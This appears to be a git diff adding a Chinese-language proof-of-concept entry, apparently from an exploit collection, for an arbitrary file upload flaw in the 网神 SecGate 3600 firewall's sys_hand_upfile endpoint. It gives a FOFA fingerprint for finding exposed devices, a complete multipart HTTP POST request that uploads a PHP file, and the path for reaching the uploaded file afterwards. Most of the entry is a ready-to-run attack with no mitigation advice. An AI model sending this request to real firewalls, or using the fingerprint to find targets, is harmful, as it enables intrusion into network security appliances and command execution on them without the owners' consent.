diff --git a/网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md b/网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md new file mode 100644 index 0000000..7b4ab2d --- /dev/null +++ b/网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞.md @@ -0,0 +1,35 @@ +## 网神SecGate 3600 防火墙sys_hand_upfile 任意文件上传漏洞 + + 网神 SecGate 3600 防火墙 sys_hand_upfile 存在任意文件上传漏洞,攻击者可构造特殊 HTTP 请求上传任意文件获取服务器权限,执行恶意命令等。 + + ## fofa + ``` +body="./images/lsec/login/loading.gif" +``` + +## poc +``` +POST /?g=sys_hand_upfile HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Trident/3.0) +Content-Length: 244 +Accept: */* +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Content-Type: multipart/form-data; boundary=gttd4i4aadwh9lmlp1ez + +--gttd4i4aadwh9lmlp1ez +Content-Disposition: form-data; name="upfile"; filename="ceshi.php" + + +--gttd4i4aadwh9lmlp1ez +Content-Disposition: form-data; name="submit_post" + +sys_hand_upfile +--gttd4i4aadwh9lmlp1ez-- +``` + +![image](https://github.com/wy876/POC/assets/139549762/6ba66f9f-affd-4600-ac29-2cfe98502b45) + +访问文件路径 +http//127.0.0.1/attachements/ceshi.php